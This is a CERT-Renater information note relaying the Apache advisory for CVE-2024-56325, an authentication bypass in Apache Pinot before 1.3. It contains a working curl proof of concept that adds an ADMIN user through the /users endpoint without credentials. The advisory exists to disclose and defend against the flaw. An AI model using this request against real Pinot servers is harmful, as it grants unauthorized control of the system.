Ce mail provient de l'extérieur, restons vigilants ===================================================================== CERT-Renater Note d'Information No. 2025/VULN183 _____________________________________________________________________ DATE : 28/03/2025 HARDWARE PLATFORM(S): / OPERATING SYSTEM(S): Systems running Apache Pinot versions prior to 1.3. ===================================================================== https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v _____________________________________________________________________ CVE-2024-56325: Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required *Severity:* critical *Affected versions:* - Apache Pinot before 1.3 *Description:* Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. *Expected Normal Request and Response Example* curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} *Malicious Request and Response Example* curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot. References:https://www.cve.org/CVERecord?id=CVE-2024-56325 Thanks Siddharth (Apache Pinot PMC) ========================================================= + CERT-RENATER | tel : 01-53-94-20-44 + + 23/25 Rue Daviel | fax : 01-53-94-20-41 + + 75013 Paris | email:cert@support.renater.fr + =========================================================